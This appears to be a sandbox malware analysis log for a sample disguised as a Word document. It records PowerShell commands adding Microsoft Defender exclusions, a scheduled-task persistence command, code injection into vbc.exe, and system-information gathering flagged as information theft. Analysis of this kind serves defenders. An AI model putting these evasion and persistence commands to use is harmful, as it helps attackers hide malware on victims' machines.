                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe"
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe"
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe"Jump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe"Jump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 459000Jump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 471000Jump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 477000Jump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 478000Jump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 479000Jump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 47E000Jump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 4D7A008Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 459000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 471000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 477000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 478000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 479000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 47E000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 51E1008Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe15_2_004120F7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_00419627 mouse_event,15_2_00419627
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe"Jump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe"Jump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE91.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpCDF3.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                Source: vbc.exe, 00000009.00000002.4510842027.000000000504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerknown.
                Source: vbc.exe, 00000009.00000002.4510842027.000000000504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerspirpc
                Source: vbc.exe, 00000009.00000002.4510842027.000000000504B000.00000004.00000020.00020000.00000000.sdmp, logs.dat.9.drBinary or memory string: [Program Manager]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_00434C52 cpuid 15_2_00434C52
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: EnumSystemLocalesW,15_2_00452036
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,15_2_004520C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: GetLocaleInfoW,15_2_00452313
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: EnumSystemLocalesW,15_2_00448404
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,15_2_0045243C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: GetLocaleInfoW,15_2_00452543
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,15_2_00452610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: GetLocaleInfoA,15_2_0040F8D1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: GetLocaleInfoW,15_2_004488ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,15_2_00451CD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: EnumSystemLocalesW,15_2_00451F50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: EnumSystemLocalesW,15_2_00451F9B
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeQueries volume information: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeQueries volume information: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0040B164 GetLocalTime,wsprintfW,15_2_0040B164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0041B60D GetUserNameW,15_2_0041B60D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,15_2_00449190
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.raw.unpack, type: UNPACKEDPE
